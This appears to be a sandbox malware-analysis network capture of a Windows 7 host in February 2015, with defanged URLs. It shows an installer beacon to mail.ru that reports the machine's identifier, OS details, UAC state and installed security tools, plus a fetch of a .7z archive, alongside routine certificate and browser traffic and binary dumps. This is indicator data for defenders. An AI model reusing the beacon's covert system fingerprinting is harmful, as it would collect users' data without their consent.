GET /update/2/version.txt?type=install&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=11&success=1&tool=sputnik&ieovr=0&ffovr=1&ffvbm=0&br=opnew&brver=27.0&bfr=0&aftr=0&bfr2=&aftr2= HTTP/1.1

Host: mrds.mail.ru

Accept: */*

User-Agent: FULLSTUFF

Connection: close


HTTP/1.1 204 No Content

Server: nginx

Date: Mon, 23 Feb 2015 09:35:27 GMT

Connection: close

GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAHevvgBk+xJc0C0AAQAAd68= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.msocsp.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:32:31 GMT

Content-Type: application/ocsp-response

Content-Length: 1757

Connection: keep-alive

Set-Cookie: __cfduid=dcaca79872f9a79d2585e951a575e0a791424683951; expires=Tue, 23-Feb-16 09:32:31 GMT; path=/; domain=.msocsp.com; HttpOnly

Last-Modified: Thu, 19 Feb 2015 03:11:58 GMT

Expires: Mon, 23 Feb 2015 03:11:58 GMT

ETag: "13515fcfa040b497356aa40b58effca759ac8719"

Cache-Control: max-age=345599,public,no-transform,must-revalidate

X-Cache: HIT

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 1bd26aaaca0d0c17-AMS
0..........0..... .....0......0...0..........<.|7...@N6p.I.e|..2015
0219031158Z0..0..0L0... ........&."f........{5.....t..Q.$&..h"W.& ;Fb.
{.....Z..w...d..\.-....w.....20150219031158Z....20150223031158Z."0 0..
. .....0......20140219031158Z0...*.H.................#w.Q......<b..
G^...P./.....S .O^.~.n...../..?..G......C"t~..../..H........0.ujH.;...
..T..v...mvy...g...........f.$e...^ ...q.Dx'.L..........p..YpWC.($..L.
Ng...b....g...y,.G.4.&.lI.8......w.E.....r......&...F....bA.]......Z..
a...N........."4.~...\z.........0...0...0..........Z..~..M..<ZYJ...
.~.0...*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redm
ond1.0...U....Microsoft Corporation1.0...U....Microsoft IT1.0...U....M
icrosoft IT SSL SHA20...141229205745Z..150314205745Z0!1.0...U....Shoul
d be ignore by CA0.."0...*.H.............0...........&!(..$.K...."=f..
..x.d.._s.....j....9`..l.Z..............^f..u......-e.&.bG.(i.Q.......
....bEy...^7A...A..c....CF-&...e.7..7F....."..w...y.:..`.w{~..D.x*....
...x3Os......q...... S.fB .ig.....L..3......4E..}..7...M....e ...6.M.O
.....<5:......r.....]..A.5........0..0...U..........<.|7...@N6p.
I.e|0...U.#..0...Q.$&..h"W.& ;Fb.{...0...U...........0...U.%..0... ...
....0... .....7....0.0... .......0... .....0......0...*.H.............
.....sa....^`.U.h.....(c[..j.|. ..#....3.5.?..L.....Z....J......*.w...
w.$.z..Y.d.....l.....G#.....o.\t.......(.B =..P..T....0./P.....z.3....
L.O3....z...Wxo..~.OeH....c.i.@."..?d.......=v(.....m..LN..PP....<.
}T.X......K.&e.S...|....% ...(F.=k..~.j..C......4.....c...._p..9.#<<< skipped >>>

GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAHevvgBk+xJc0C0AAQAAd68= HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.msocsp.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:32:31 GMT

Content-Type: application/ocsp-response

Content-Length: 1757

Connection: keep-alive

Set-Cookie: __cfduid=dcaca79872f9a79d2585e951a575e0a791424683951; expires=Tue, 23-Feb-16 09:32:31 GMT; path=/; domain=.msocsp.com; HttpOnly

Last-Modified: Thu, 19 Feb 2015 03:11:58 GMT

Expires: Mon, 23 Feb 2015 03:11:58 GMT

ETag: "13515fcfa040b497356aa40b58effca759ac8719"

Cache-Control: max-age=345599,public,no-transform,must-revalidate

X-Cache: HIT

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 1bd26aab3a260c17-AMS
0..........0..... .....0......0...0..........<.|7...@N6p.I.e|..2015
0219031158Z0..0..0L0... ........&."f........{5.....t..Q.$&..h"W.& ;Fb.
{.....Z..w...d..\.-....w.....20150219031158Z....20150223031158Z."0 0..
. .....0......20140219031158Z0...*.H.................#w.Q......<b..
G^...P./.....S .O^.~.n...../..?..G......C"t~..../..H........0.ujH.;...
..T..v...mvy...g...........f.$e...^ ...q.Dx'.L..........p..YpWC.($..L.
Ng...b....g...y,.G.4.&.lI.8......w.E.....r......&...F....bA.]......Z..
a...N........."4.~...\z.........0...0...0..........Z..~..M..<ZYJ...
.~.0...*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redm
ond1.0...U....Microsoft Corporation1.0...U....Microsoft IT1.0...U....M
icrosoft IT SSL SHA20...141229205745Z..150314205745Z0!1.0...U....Shoul
d be ignore by CA0.."0...*.H.............0...........&!(..$.K...."=f..
..x.d.._s.....j....9`..l.Z..............^f..u......-e.&.bG.(i.Q.......
....bEy...^7A...A..c....CF-&...e.7..7F....."..w...y.:..`.w{~..D.x*....
...x3Os......q...... S.fB .ig.....L..3......4E..}..7...M....e ...6.M.O
.....<5:......r.....]..A.5........0..0...U..........<.|7...@N6p.
I.e|0...U.#..0...Q.$&..h"W.& ;Fb.{...0...U...........0...U.%..0... ...
....0... .....7....0.0... .......0... .....0......0...*.H.............
.....sa....^`.U.h.....(c[..j.|. ..#....3.5.?..L.....Z....J......*.w...
w.$.z..Y.d.....l.....G#.....o.\t.......(.B =..P..T....0./P.....z.3....
L.O3....z...Wxo..~.OeH....c.i.@."..?d.......=v(.....m..LN..PP....<.
}T.X......K.&e.S...|....% ...(F.=k..~.j..C......4.....c...._p..9.#<<< skipped >>>

GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAHevvgBk+xJc0C0AAQAAd68= HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.msocsp.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:32:31 GMT

Content-Type: application/ocsp-response

Content-Length: 1757

Connection: keep-alive

Set-Cookie: __cfduid=dcaca79872f9a79d2585e951a575e0a791424683951; expires=Tue, 23-Feb-16 09:32:31 GMT; path=/; domain=.msocsp.com; HttpOnly

Last-Modified: Thu, 19 Feb 2015 03:11:58 GMT

Expires: Mon, 23 Feb 2015 03:11:58 GMT

ETag: "13515fcfa040b497356aa40b58effca759ac8719"

Cache-Control: max-age=345599,public,no-transform,must-revalidate

X-Cache: HIT

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 1bd26aabca370c17-AMS
0..........0..... .....0......0...0..........<.|7...@N6p.I.e|..2015
0219031158Z0..0..0L0... ........&."f........{5.....t..Q.$&..h"W.& ;Fb.
{.....Z..w...d..\.-....w.....20150219031158Z....20150223031158Z."0 0..
. .....0......20140219031158Z0...*.H.................#w.Q......<b..
G^...P./.....S .O^.~.n...../..?..G......C"t~..../..H........0.ujH.;...
..T..v...mvy...g...........f.$e...^ ...q.Dx'.L..........p..YpWC.($..L.
Ng...b....g...y,.G.4.&.lI.8......w.E.....r......&...F....bA.]......Z..
a...N........."4.~...\z.........0...0...0..........Z..~..M..<ZYJ...
.~.0...*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redm
ond1.0...U....Microsoft Corporation1.0...U....Microsoft IT1.0...U....M
icrosoft IT SSL SHA20...141229205745Z..150314205745Z0!1.0...U....Shoul
d be ignore by CA0.."0...*.H.............0...........&!(..$.K...."=f..
..x.d.._s.....j....9`..l.Z..............^f..u......-e.&.bG.(i.Q.......
....bEy...^7A...A..c....CF-&...e.7..7F....."..w...y.:..`.w{~..D.x*....
...x3Os......q...... S.fB .ig.....L..3......4E..}..7...M....e ...6.M.O
.....<5:......r.....]..A.5........0..0...U..........<.|7...@N6p.
I.e|0...U.#..0...Q.$&..h"W.& ;Fb.{...0...U...........0...U.%..0... ...
....0... .....7....0.0... .......0... .....0......0...*.H.............
.....sa....^`.U.h.....(c[..j.|. ..#....3.5.?..L.....Z....J......*.w...
w.$.z..Y.d.....l.....G#.....o.\t.......(.B =..P..T....0./P.....z.3....
L.O3....z...Wxo..~.OeH....c.i.@."..?d.......=v(.....m..LN..PP....<.
}T.X......K.&e.S...|....% ...(F.=k..~.j..C......4.....c...._p..9.#<<< skipped >>>

GET /speeddials/partner/ebay_us HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/ebay_us/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601651

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /speeddials/partner/wikipedia_org_us HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/wikipedia_org_us/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2724563542

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/youtube_other/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "c4895-1d53-50ecea1134600"

Content-Type: image/png

Content-Length: 7507

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601703 2598510018

Age: 269

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 509
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:BBFA
F01BBED211E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:BBFAF01ABED211
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:887021171320681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>........IDATx....tTe..kOU%..HHH.EF6..Dv....
.....rdT.qm..i.il9...6.8..[.....AZ.8..... .,..%......._u........P!....
S..r.{.^......~..644XX....O...e..Y...e1.,.#.b1.,F..bdY,F....X.,.....Y.
..e..Y.#.b1.,.#.bdY,F..bdY.,....X.,..e..Y...e1.,.#.b1.,.#.bdY,F..bdY.,
....X.,..e..Y...e1.,.#.b1.,F..bdY,F....X.,...9..dUJ0.kn.?..b..%..Sii..
.JKK......Q...PH..c..%..1..kl..........F..z.5/..r......9....j.y.....v[
.N. n....0......x....k....=......RkCC........l....7...........~..?..\.
...o.ko~.cz...*....u.?.[...q..p..../_............[|.M......../?.~.<<< skipped >>>

GET /NaviData?mac=1&gamescnt=1&rnd=1424684153609 HTTP/1.1

Host: portal.mail.ru

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Origin: hXXp://go.mail.ru

Accept: */*

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 54

Connection: close

Access-Control-Allow-Origin: hXXp://go.mail.ru

Access-Control-Allow-Methods: GET, POST

Access-Control-Allow-Credentials: true

Cache-Control: no-cache,no-store,must-revalidate

Pragma: no-cache

Expires: Sun, 23 Feb 2014 09:35:34 GMT

Last-Modified: Mon, 23 Feb 2015 12:35:34 GMT

Set-Cookie: mrcu=E8FE54EAF466748E05E0E7F48AC1; expires=Thu, 20 Feb 2025 09:35:34 GMT; path=/; domain=.mail.ru

P3P: CP="NON CUR OUR IND UNI INT"
{"status":"noauth","data":{"action":"list","list":[]}}..

HEAD /go_chhp11956636.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Connection: close


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-7z-compressed

Content-Length: 30942

Connection: close

Last-Modified: Wed, 17 Dec 2014 16:01:56 GMT

ETag: "5491a8f4-78de"

Accept-Ranges: bytes

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEAdvEkaBRZwo1UjWl8QOABs= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.usertrust.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:37 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Sun, 22 Feb 2015 14:28:55 GMT

Expires: Thu, 26 Feb 2015 14:28:55 GMT

ETag: 430FD33EA642EF827E89DD858BFC2DC6B334875C

Cache-Control: max-age=276197,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: h6edcaocsp7

Content-Length: 471

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........z4.&...&T....$.T...2015022
2142855Z0s0q0I0... ........|.fT...D.b&...e{.z.......z4.&...&T....$.T..
..o.F.E.(.H..........20150222142855Z....20150226142855Z0...*.H........
...........k......U....z..........: ..r%..kc...Vm.x1.5.Q!..o.).~.k...m
t.X!'... l^.{..T1jP.I..c2.]. ....7.7..R.1.}.7.Z*"..`..."......~.D..0-.
.5 ....Y..c,.4 o`.w./.C........{.yk.........2......<.R.C][$y.../...
.2..7f...t...<B1..6=.)%O\.....'2y..X.E..Ci.$.M...;'X....

GET / HTTP/1.1

Host: VVV.youtube.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 301 Moved Permanently

Date: Mon, 23 Feb 2015 09:31:46 GMT

Server: gwiseguy/2.0

Location: hXXps://VVV.youtube.com/

Content-Length: 0

Cache-Control: no-cache

Content-Type: text/html; charset=utf-8

P3P: CP="This is not a P3P policy! See hXXp://support.google.com/accounts/answer/151657?hl=en for more info."

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block; report=hXXps://VVV.google.com/appserve/security-bugs/log/youtube

Expires: Tue, 27 Apr 1971 19:44:06 EST

Alternate-Protocol: 80:quic,p=0.08

Set-Cookie: VISITOR_INFO1_LIVE=t4JhqJG6SeU; expires=Sat, 24-Oct-2015 21:24:46 GMT; path=/; domain=.youtube.com; HttpOnly

Set-Cookie: YSC=EnWn5C6Tzl4; path=/; domain=.youtube.com; HttpOnly
HTTP/1.1 301 Moved Permanently..Date: Mon, 23 Feb 2015 09:31:46 GMT..S
erver: gwiseguy/2.0..Location: hXXps://VVV.youtube.com/..Content-Lengt
h: 0..Cache-Control: no-cache..Content-Type: text/html; charset=utf-8.
.P3P: CP="This is not a P3P policy! See hXXp://support.google.com/acco
unts/answer/151657?hl=en for more info."..X-Content-Type-Options: nosn
iff..X-XSS-Protection: 1; mode=block; report=hXXps://VVV.google.com/ap
pserve/security-bugs/log/youtube..Expires: Tue, 27 Apr 1971 19:44:06 E
ST..Alternate-Protocol: 80:quic,p=0.08..Set-Cookie: VISITOR_INFO1_LIVE
=t4JhqJG6SeU; expires=Sat, 24-Oct-2015 21:24:46 GMT; path=/; domain=.y
outube.com; HttpOnly..Set-Cookie: YSC=EnWn5C6Tzl4; path=/; domain=.you
tube.com; HttpOnly......

GET /static/web/js/main.js?9990c3c3 HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:33 GMT

Content-Type: application/x-javascript

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:33 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Content-Encoding: gzip
9ae.............Y.....~...].0...&p$3B.8.....ur.......).!GZ/$.n....E.{.
>.[.hQ ~.. .I..3.H.....].l.s...9..9...eq..E6..e..e..Z..@. ...\/d.yr
......r....x..oTQ.Y..t.".(U...X....(..T[.aaX.~..{.).././T....F.Ib "...
11...d...WY..d.....z..].i.].Y..TI.#..0......L..8..]Hz.@...e.u......,..
p....F`.u.....O.,.......B.v..'..T...p...^-.>.g*.k.u..2Ir.C......_..
MKDz....dY=$O..@....?.x.\..................6x..Z...DK{A$.......m{m.-{.
?.S.j......;\.x7..U...t'.&...g@...8....T4.E.M.b<N.....!.I.I....l.D.
.......:!..Q\...B7H..V.z...Y..q...I.....p{.1..yQ.?v....o........L,....
kj..0E.....yB.... $..p..;*.D.D.E..........UR...T'...(.;.9...;/..E.... 
.'.b.!..M^d...C~.}X(=/.%9.@.......r.W..I.C.o....G.....^...&..x........
.=..K.<.W..p....i>.J..[..i...ze.iv.........k.y..q:..........lz.S
..Mg.i...-f.....O..[....jA@.I.M....Z.=..F..%...!n..g.NY..8C,.88.P....h
..|!_...8..w.OD'.l...l.EtJ}....A...t.,U.#.3!>.E..g.).{....\....1<
;.Z...~.X'.&.o.S.8M ..O.O....<b0.J..g..Y.jU.OYc...O...A....c...G..3
.b.......4.WH..<..#...@c..%..^.....j..'.5...$.*]...IS..DU....eDq.e:
#....jk..l...]b...^......_....S9S..........R...I..."z....>`..R..V.e
..I..........=...d....[^..."..........%-.D.............!.F....GOK...|.
....Q.>..K7.F.!'.....).....\.R..#(._V.,.Nz.I.vi3.....b.... Y<@.,
.......].H......6...P... `....b..&X......h/k.v.@J.y..u.~.....R..Y.2V. 
.A..d.N.6.lx'..R..p...z.........b..._.^o.\}........W.o..g...6o7.......
.ywz.!..NR..1.;.m{...,.]p=v'.....;..I...7..~.{gd.5.u.....c.MyB.....FY.
.NL2.m..V8e..{......$...keH7.._.....*..8.U*..=.93YL...L.l6.!..r.f.<<< skipped >>>

GET /static/img/b25logo/favicon/ebc77706da3aae4aee7b05dadf182390f0d26d11.ico HTTP/1.1

Host: r-ec.bstatic.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Accept-Ranges: bytes

Access-Control-Allow-Origin: *

Cache-Control: max-age=2592000

Content-Type: image/x-icon

Date: Mon, 23 Feb 2015 09:35:40 GMT

Etag: "52110f5b-62e"

Expires: Wed, 25 Mar 2015 09:35:40 GMT

Last-Modified: Sun, 18 Aug 2013 18:15:55 GMT

Server: ECS (fcn/41B7)

X-Cache: HIT

Content-Length: 1582

......  ..........6...........................(.......(... ...@.......
.........................5...M...jC...)...g...........................
................................'w...............w....................
......................................................................
..........UUUUa...3.......UUUUU .330......UUUUUQ.330......UR.&UR.33 ..
....UR..UV..3.......UR..UT..........UT..UQ..........UUUUU`..........UU
UUV...........UUUUU...........UR.EU`..........UR..Ua..........UR..U`..
........UV.EUa..........UUUUU ..........UUUUV...........%UUU@.........
..............................................@...............q.......
........w..............wwt............'w..............................
......................................................................
............................(.......0........... ....................5
...S...jD...>......................................................
......w...............................................................
UUT`.31.....UUUV.33.....U.$U.33.....U..U .0.....U..U........UUUV......
..UUUQ........U..V........U..T........U %T........UUUR........EUT ....
..................................... ...........p...........w!.......
..w...................................................................
.............................(....... ................................
5...T...h@............................................................
...................ff@.3...ffd.3...`.e.3...`.d.....ffb.....ff`.....`.b
.....`.d.....ff`.....UT....................q......................

<<< skipped >>>

GET /static/web/js/lib.js?fa064f74 HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:33 GMT

Content-Type: application/x-javascript

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:33 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Content-Encoding: gzip
600a................[Gv...<..-..b.XE]...]......"...URl...*\........
......_f.L....y.v..c... .ot~.....BQ...1.ba_r.e.......Yo5..*.d..~9.!]..
....~.r.^..Y.r........^4juo.n%/^d..WJ%..R.....dQ.....W.Q..{.2.N..a.=J.
..V....H..C .T.B....^l|.O...d.../[...n..a.....".|.t0.#.....;.?KV.f.]..
b0.....d.L?..jI.^.....h....7......*].\..'.D...j..7;8:...nm.g..~=....A.
....>?.....v.he ......b................x........\.?.?M.w.m..\...`'.
....lxw~1[..e..2...U......ON.g........49...P..b5./...,]|...O_...tEs...
..X...."....Z.0i.R..Kk...f.eo1>_..j...r...l.9.u|ptk8...Px<.Z.F.f
..X.zq.F.....z..Q.5/....I......~..d.L...U7...6K.V>.&...P..3....wY..
.....J...o.&O.WB...G5J6..KFQg...f.......eww...p2.&..O.I.[..K.....Ku&..
...$...Am.[....&.....e........Di.4{.d........j.w.a`.y~...~.0.....A....
.....tw..k.m~[U..e......`c5......m...G...a<x...t.......t?C.|@n...*k
e.2....j<Y..Z..........(....bx1Mg.e...v..V.."..i....ebT......*....0
".g/........}..7.s..\.u.....U...[|w...9..W_...S5\..=...M-......~....jt
......E..x..p..c....-....~.........l.0}|.H../............hy....e _.nm.
...>..i.KH.....b1_..C...l......u.\.......t&.6..jQ..j..:.}/9.{....W.
.z.z%.p.....0/..2.h....(.9..,....$*J.....j...G...~.v.N.....$.e\M..B@..
..$y^....X.....n.....?.I....d.b....w..^../...W...._................~..
_.........^............._..k.......R...?^.....B.....)........R....z..?
........[.G...[...U.o.'.Ka.. .c...............*.. .Q.o^.M.z...........
..I...Q!..G.a..?........{.oTS.'.O....o...M....W../....#U1........W.Uy.
7j...^........@n@...../.B...b.....K..w..{.........$ T.k*...#O....7<<< skipped >>>

GET /wallpapers/230215.jpg HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: image/jpeg

Content-Length: 135254

Last-Modified: Sun, 22 Feb 2015 21:07:04 GMT

Connection: keep-alive

Accept-Ranges: bytes

......JFIF.....H.H.....XExif..MM.*...............................i....
.....2.....................................!hXXp://ns.adobe.com/xap/1.
0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:x
mpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0"> <rdf:R
DF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf
:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>

<<< skipped >>>

GET /static/web/img/icons/ico_search.png HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.imgsmail.ru/static/web/css/main.css?7bf07569

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: image/png

Content-Length: 396

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:34 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Accept-Ranges: bytes
.PNG........IHDR..............H-.....sBIT....|.d.....pHYs.........B.4.
....tEXtCreation Time.01/24/12..x.....tEXtSoftware.Adobe Fireworks CS4
........IDAT(...=J.A............A..7.....@.P........y....V..H...e.30..
.S.A._.~.E.D.!...RJP........r.F=..x.&......^.&6I.9...{L).....}.'8[.9.o
\....Gx....=.X..?......H).ua..4.n.p&.b.R:o.;.)...wbuWE]._..;n....a....
"D..*.QVe.l..d...L....)"......O;"9....IEND.B`.HTTP/1.1 200 OK..Server:
 nginx..Date: Mon, 23 Feb 2015 09:35:34 GMT..Content-Type: image/png..
Content-Length: 396..Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT..Con
nection: keep-alive..Expires: Thu, 05 Mar 2015 09:35:34 GMT..Cache-Con
trol: max-age=864000..Access-Control-Allow-Origin: *..Accept-Ranges: b
ytes...PNG........IHDR..............H-.....sBIT....|.d.....pHYs.......
..B.4.....tEXtCreation Time.01/24/12..x.....tEXtSoftware.Adobe Firewor
ks CS4........IDAT(...=J.A............A..7.....@.P........y....V..H...
e.30...S.A._.~.E.D.!...RJP........r.F=..x.&......^.&6I.9...{L).....}.'
8[.9.o\....Gx....=.X..?......H).ua..4.n.p&.b.R:o.;.)...wbuWE]._..;n...
.a...."D..*.QVe.l..d...L....)"......O;"9....IEND.B`.....


GET /pxt?pxn=mpic&_=1424684155023&e=507f606c18792767&r=&w=26&h=l&a=none HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 204 No Content

Server: nginx

Date: Mon, 23 Feb 2015 09:35:35 GMT

Connection: keep-alive

Access-Control-Allow-Origin: hXXp://go.mail.ru

HTTP/1.1 204 No Content..Server: nginx..Date: Mon, 23 Feb 2015 09:35:3
5 GMT..Connection: keep-alive..Access-Control-Allow-Origin: hXXp://go.
mail.ru......

GET /ThawtePremiumServerCA.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.thawte.com


HTTP/1.1 200 OK

